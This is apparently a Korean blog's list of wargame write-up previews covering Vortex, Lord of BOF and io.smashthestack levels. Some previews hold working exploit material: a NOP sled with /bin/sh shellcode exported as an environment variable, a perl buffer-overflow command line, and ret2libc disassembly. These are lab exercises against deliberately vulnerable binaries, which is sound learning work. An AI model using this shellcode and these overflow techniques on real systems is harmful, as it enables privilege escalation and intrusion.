wargame 썸네일형 리스트형 vortex4 Vortex Level 4 → Level 5To exec or not to execThis is the common format string bug, exploit it with care though as a check is made with argc. What is the layout of a process’s memory? How are programs executed?Reading MaterialFormat String TechniqueExploiting Format String VulnerabilitiesBypassing StackGuard and StackShieldIncluded file: vortex4.c// -- andrewg, original author was zen-parse :) #.. 더보기 vortex3 Vortex Level 3 → Level 4A Stack Overflow with a DifferenceThis level is pretty straight forward. Just sit down and understand what the code is doing. Your shellcode will require a setuid(LEVEL4_UID) since bash drops effective privileges. You could alternatively write a quick setuid(geteuid()) wrapper around bash.NOTE: ctors/dtors might no longer be writable, although this level is compiled with .. 더보기 vortex2 Vortex Level 2 → Level 3Level GoalCreate a special tar fileHelpful Reading MaterialGNU tar manualIncluded file: vortex2.c#include #include #include int main(int argc, char **argv) { char *args[] = { "/bin/tar", "cf", "/tmp/ownership.$$.tar", argv[1], argv[2], argv[3] }; execv(args[0], args); } 소스를 해석하자면 execv 함수로 다음의 명령을 실행한다./bin/tar -cf /tmp/ownership.$$.tar argv[1] argv[2] argv[3]tar 에 c옵션은 새.. 더보기 cobolt to goblin 1.ret2libc[cobolt@localhost cobolt]$ gdb -q goblin(gdb) set disassembly-flavor intel(gdb) disas mainDump of assembler code for function main:0x80483f8 : push %ebp0x80483f9 : mov %ebp,%esp0x80483fb : sub %esp,160x80483fe : lea %eax,[%ebp-16]0x8048401 : push %eax0x8048402 : call 0x804830c 0x8048407 : add %esp,40x804840a : lea %eax,[%ebp-16]0x804840d : push %eax0x804840e : push 0x80484700x8048413 :.. 더보기 gremlin to cobolt 1.ret2libc[gremlin@localhost gremlin]$ gdb -q cobolt(gdb) set disassembly-flavor intel(gdb) disas mainDump of assembler code for function main:0x8048430 : push %ebp0x8048431 : mov %ebp,%esp0x8048433 : sub %esp,160x8048436 : cmp DWORD PTR [%ebp+8],10x804843a : jg 0x8048453 0x804843c : push 0x80484d00x8048441 : call 0x8048350 0x8048446 : add %esp,40x8048449 : push 00x804844b : call 0x8048360 0x804.. 더보기 gate to gremlin 1.환경변수를 이용한 공격 bash2 //bash는 badchar를 null로 인식export hack=`perl -e 'print "\x90"x100,"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80";'`cat > env.c#include #include int main(int argc,char *argv[]){printf("%p\n",getenv(argv[1]));return 0;}crtl+d gcc -o env env.c ./env hack //결과로 0xbffffe30반환 ./gremlin `perl -e 'print "\x90"x260,"\x30\xfe\xff\x.. 더보기 level2 level2@io:/levels$ cat level02.c//a little fun brought to you by bla #include #include #include #include void catcher(int a){ setresuid(geteuid(),geteuid(),geteuid()); printf("WIN!\n"); system("/bin/sh"); exit(0);} int main(int argc, char **argv){ puts("source code is available in level02.c\n"); if (argc != 3 || !atoi(argv[2])) //인자를 2개 줘야하고 2번쨰인자가 0이면 안된다. return 1; signal(SIGFPE, catcher); //S.. 더보기 level1을 풀다가 생긴 의문점에 대한 분석 1. 메인함수에서 함수를 불러올때 인자를 주지않았는데 어떻게 함수가 정상실행 되는가? 2.YouWin함수는 어떻게 쉘을 실행시키는가 3.fscanf 역추적으로 풀기fscanf가 어떤것인지는 알고 있었지만 레페런스를 찾아보지않고 처음에 풀려는 고집떄메, 역추적으로 문제를 풀었다. 0804809f : 804809f: 81 ec 00 10 00 00 sub $0x1000,%esp 80480a5: b8 03 00 00 00 mov $0x3,%eax //read 시스템콜 80480aa: bb 00 00 00 00 mov $0x0,%ebx // 0번 fd (stdin) 80480af: 89 e1 mov %esp,%ecx 80480b1: ba 00 10 00 00 mov $0x1000,%edx 80480b6: cd .. 더보기 level1 putty로 접속 ssh level1@io.smashthestack.orgpassword: level1 level1@io:~$ cd /levelslevel1@io:/levels$ gdb -q level01Reading symbols from /levels/level01...(no debugging symbols found)...done.(gdb) disas mainDump of assembler code for function main: 0x08048080 : push $0x8049128 0x08048085 : call 0x804810f 0x0804808a : call 0x804809f 0x0804808f : cmp $0x10f,%eax 0x08048094 : je 0x80480dc 0x0804809a .. 더보기 vortex1 Putty를 이용해 vortex0에서 얻은 계정을 가지고 vortex.labs.overthewire.org에 ssh로 접속한다.일단 타겟의 위치는 /games/vortex/vortex1이고 해당 소스코드는 홈페이지의 해당 문제 페이지에 있다. #include #include #include #include #define e(); if(((unsigned int)ptr & 0xff000000)==0xca000000) { setresuid(geteuid(), geteuid(), geteuid()); execlp("/bin/sh", "sh", "-i", NULL); } void print(unsigned char *buf, int len) { int i; printf("[ "); for(i=0; i < len.. 더보기 이전 1 ··· 6 7 8 9 10 다음
